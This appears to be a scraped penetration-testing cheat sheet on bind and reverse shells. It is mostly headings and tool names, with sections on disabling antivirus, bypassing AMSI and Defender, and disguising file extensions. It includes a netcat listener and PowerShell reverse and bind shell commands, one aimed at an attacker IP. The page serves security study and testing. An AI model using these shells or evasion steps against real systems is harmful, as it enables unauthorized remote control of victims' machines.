Bind and Reverse Shell

Tools

Online

LazyRevShell

LazyShell

One-Lin3r

One-Lin3r

FuegoShell

Web Shells

Web Shell

Reverse Shell - Not Web

Online - Reverse Shell Generator

revshell.sh - Test all methods

rs-shell - RS in Rust

Rust RS

Secure Reverse Shell

Reverse shell tool that uses AES-GCM (256-bit) encryption and ECDH (Curve P-256) to ensure encrypted and protected communication

FullBypass

Bypass AMSI

rcat

PowerJoker - Powershell Reverse Shell - Bypass Defender

Over UDP

Attack Host

nc -nlvp 1234

Netcat - Victim

Netcat traditional

Socat - Victim

Encrypted

Bash - Victim

Python - Victim

Powershell - Victim

If:

=> Disable AV

Disable / Remove AV Defender and Firewall

Invoke-PowershellTcp.ps1

PS > Invoke-PowerShellTcp -Reverse -IPAddress 192.168.254.226 -Port 4444

DLL

MSFVenom

Linux

Windows

Cheatsheet:

More on: https://www.revshells.com/

Metasploit

Bypass AV / EDR

Curl

Bind Shell - Not Web

Netcat -Victim

Encrypted shell

Socat - Vicitim

Bash - Victim

Debugging

Python - Victim

Powershell - Vicitm

Invoke-PowershellTcp.ps1

PS > Invoke-PowerShellTcp -Bind -Port 4444

Attack Host

Right to left override - Masquerading

Takes a file (usually executable) and appends a Unicode right to left override character to disguise the real file extension

Shell inside a PNG

TTY upgrade

TTY Upgrade

Resources

Last updated